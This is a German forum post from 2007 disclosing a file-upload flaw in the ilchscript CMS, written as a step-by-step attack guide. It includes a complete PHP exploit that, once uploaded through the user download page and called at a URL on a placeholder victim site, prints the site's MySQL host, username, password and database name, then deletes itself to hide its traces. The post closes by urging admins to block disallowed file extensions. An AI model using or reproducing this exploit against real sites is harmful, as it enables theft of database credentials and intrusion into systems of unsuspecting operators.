also der Fehler liegt bei den Useruplloads
hier ne Anleitung:
also der Fehler liegt in der Programmierung...ich kann als registrierter User Dateien auf den Server laden unter Downloads nach dem hochladen muss ein Mod oder Admin sie zwar aktivieren aber es reicht ja das sie auf dem Server drauf sind....
1. registrieren
2. Downloadpage aufrufen
3. php-datei mit folgendem Inhalt hochladen(name ist hier "xploit.php"):
<?php
//ilchscript-hack by neo aka white-hat
include("../../../includes/config.php");
echo "<center>";
echo "<br><br><br>MySQL Daten: <br><br>";
echo "host: ";
echo DBHOST;
echo "<br>";
echo "username: ";
echo DBUSER;
echo "<br>";
echo "passwort: ";
echo DBPASS;
echo "<br>";
echo "Datenbank: ";
echo DBDATE;
echo "<br>";
echo "präfix: ";
echo DBPREF;
echo "<br><br><br>";
echo "</center>";
unlink("xploit.php");
if(is_file("xploit.php")){
echo "<br><br><center>Datei wurde nicht gelöscht !!!";
}else{
echo "<br><br><center>Datei wurde gelöscht - Spuren wurden verwischt";
}
echo "<br><br><strong>Scripted by Neo</stron></center>";
?>
4.Datei wurde hochgeladen -> Fehlermeldung erscheint manchmal das die Dateiendung nicht hinhaut -> Datei wurde aber trotzdem geuppt
5. URL aufrufen:
www.victim.de/include/downs/downloads/user_upload/xploit.php
6. Script gibt alle MySQL Daten aus und löscht sich selbst
ist eigentlich recht billig
Also bitte einfach die Dateiendungen die NICHT zugelassen sind einfach nicht uploaden lassen !!! Wenn ihr noch Coder braucht oder Security Tester sagt bescheid
Zuletzt modifiziert von white-hat am 22.01.2007 - 00:19:31